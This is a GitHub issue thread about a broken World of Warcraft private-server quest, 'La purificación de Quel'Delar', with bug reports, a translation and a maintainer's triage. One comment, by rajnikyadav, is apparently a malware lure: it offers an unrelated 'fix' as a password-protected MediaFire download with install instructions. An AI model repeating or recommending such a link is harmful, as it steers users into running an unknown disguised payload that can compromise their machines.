### ISSUE TITLE
BUG MISION "La purificación de Quel'Delar"

### ISSUE THREAD

**Issue by sh4d0ws92** [gamefreedomgit/Maelstrom#6110]
https://www.wowhead.com/es/quest=24553/la-purificaci%C3%B3n-de-queldelar

**Description:**

Primeramente, si hablamos con el guardia de la entrada a la meseta, no te deja entrar si no estas en un grupo de banda, en principio debería dejar entrar sin que sea necesario estar en un grupo de raid.
Y en segundo lugar, si accedemos por intermedio de un grupo de banda, si nos acercamos a la fuente de sol y arrojamos el arma, no produce ningún efecto y perdemos el ítem de la misión

**Comment by Sketish** [comment]
Translate to english pls

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sh4d0ws92** [comment]
Regarding the bug, it should be said first that if we talk to any of the guards at the entrance to the Sunwell Plateau, they will not allow you to enter if you are not in a raid group. It should allow entry without it being necessary to be in a raid group.
And secondly, if we enter while in a raid group, and once inside we approach the sun fountain and throw the weapon, it has no effect and we lose the mission item.

**Comment by frostwave942** [comment]
same problem, when u get to sunwell and click on the sword nearby, nothing happens. it seems like there's no script. also when u enter the raid through portal u can't get out, u have to leave group and wait 1 min to spawn on nearest graveyard.

**Comment by PanJanuszek** [comment]
Can you point, what is your class + race? Record some clip?

**Comment by PanJanuszek** [comment]
Come back with clip, it works whenever i try this quest.

**Comment by WhitemaneChronus** [comment]
It seems the quest works in the end but the teleport option requires them to be in a raid group.
They should be able to take the teleport by talking to the wardens infront of the raid, without being in a raid group.
Player managed to complete the quest after joining the raid group
